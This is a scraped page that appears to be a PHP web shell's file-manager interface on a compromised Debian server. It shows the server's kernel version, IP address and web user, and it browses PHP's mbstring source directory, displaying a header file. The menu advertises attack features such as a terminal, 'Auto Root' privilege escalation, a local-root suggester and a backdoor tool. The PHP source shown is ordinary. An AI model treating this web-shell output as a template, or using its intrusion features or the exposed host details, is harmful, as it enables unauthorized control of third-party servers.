Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
mbstring /
Delete
Unzip
Name
Size
Permission
Date
Action
.libs
[ DIR ]
drwxr-xr-x
2024-03-12 14:28
libmbfl
[ DIR ]
drwxrwxr-x
2024-03-12 14:19
tests
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
ucgendat
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
CREDITS
56
B
-rw-rw-r--
2022-10-31 11:36
config.m4
7.14
KB
-rw-rw-r--
2022-10-31 11:36
config.w32
3.77
KB
-rw-rw-r--
2022-10-31 11:36
mb_gpc.c
10.24
KB
-rw-rw-r--
2022-10-31 11:36
mb_gpc.h
1.98
KB
-rw-rw-r--
2022-10-31 11:36
mb_gpc.lo
322
B
-rw-r--r--
2024-03-12 14:28
mb_gpc.o
107.07
KB
-rw-r--r--
2024-03-12 14:28
mbstring.c
148.43
KB
-rw-rw-r--
2022-10-31 11:36
mbstring.h
6.75
KB
-rw-rw-r--
2022-10-31 11:36
mbstring.lo
328
B
-rw-r--r--
2024-03-12 14:28
mbstring.o
798.1
KB
-rw-r--r--
2024-03-12 14:28
php_mbregex.c
43.6
KB
-rw-rw-r--
2022-10-31 11:36
php_mbregex.h
4.37
KB
-rw-rw-r--
2022-10-31 11:36
php_mbregex.lo
337
B
-rw-r--r--
2024-03-12 14:28
php_mbregex.o
269.77
KB
-rw-r--r--
2024-03-12 14:28
php_onig_compat.h
256
B
-rw-rw-r--
2022-10-31 11:36
php_unicode.c
11.98
KB
-rw-rw-r--
2022-10-31 11:36
php_unicode.h
9.21
KB
-rw-rw-r--
2022-10-31 11:36
php_unicode.lo
337
B
-rw-r--r--
2024-03-12 14:28
php_unicode.o
192.57
KB
-rw-r--r--
2024-03-12 14:28
unicode_data.h
243.11
KB
-rw-rw-r--
2022-10-31 11:36
Save
Rename
/* +----------------------------------------------------------------------+ | PHP Version 7 | +----------------------------------------------------------------------+ | Copyright (c) The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Author: Rui Hirokawa <hirokawa@php.net> | | Moriyoshi Koizumi <moriyoshi@php.net> | +----------------------------------------------------------------------+ */ /* {{{ includes */ #ifdef HAVE_CONFIG_H #include "config.h" #endif #include "php.h" /* }}} */ #if HAVE_MBSTRING /* {{{ typedefs */ typedef struct _php_mb_encoding_handler_info_t { const char *separator; const mbfl_encoding *to_encoding; const mbfl_encoding **from_encodings; size_t num_from_encodings; int data_type; unsigned int report_errors : 1; enum mbfl_no_language to_language; enum mbfl_no_language from_language; } php_mb_encoding_handler_info_t; /* }}}*/ /* {{{ prototypes */ SAPI_POST_HANDLER_FUNC(php_mb_post_handler); MBSTRING_API SAPI_TREAT_DATA_FUNC(mbstr_treat_data); int _php_mb_enable_encoding_translation(int flag); const mbfl_encoding *_php_mb_encoding_handler_ex(const php_mb_encoding_handler_info_t *info, zval *arg, char *res); /* }}} */ #endif /* HAVE_MBSTRING */